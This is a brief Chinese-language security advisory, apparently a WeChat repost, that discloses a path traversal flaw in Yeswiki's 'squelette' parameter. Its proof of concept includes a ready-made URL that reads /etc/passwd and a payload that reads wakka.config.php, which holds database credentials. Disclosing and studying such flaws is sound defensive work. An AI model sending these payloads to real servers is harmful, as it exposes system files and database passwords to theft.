Yeswiki 路径遍历漏洞允许任意读取文件 POC

概括

该squelette参数容易受到路径遍历攻击，从而允许读取服务器上的任意文件。有效载荷../../../../../../etc/passwd已在参数中提交squelette。请求的文件已在应用程序的响应中返回。

细节

当用户可控制的数据以不安全的方式在文件系统操作中使用时，就会出现文件路径遍历漏洞。通常，用户提供的文件名会附加到目录前缀中，以便读取或写入文件内容。如果存在漏洞，攻击者可以提供路径遍历序列（使用点-点-斜杠字符）来突破目标目录并在文件系统的其他位置读取或写入文件。

概念证明

1. 访问以下 URL 即可查看内容/etc/passwd：

带有有效负载的 URL：https://yeswiki.net/?UrkCEO/edit&theme=margot&squelette=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&style=margot.css

wakka.config.php类似地，可以使用payload读取内容（其中包含数据库密码） ..%2f..%2f..%2fwakka.config.php。从而显示了此问题的严重性。

原文始发于微信公众号（TtTeam）：Yeswiki 路径遍历漏洞允许任意读取文件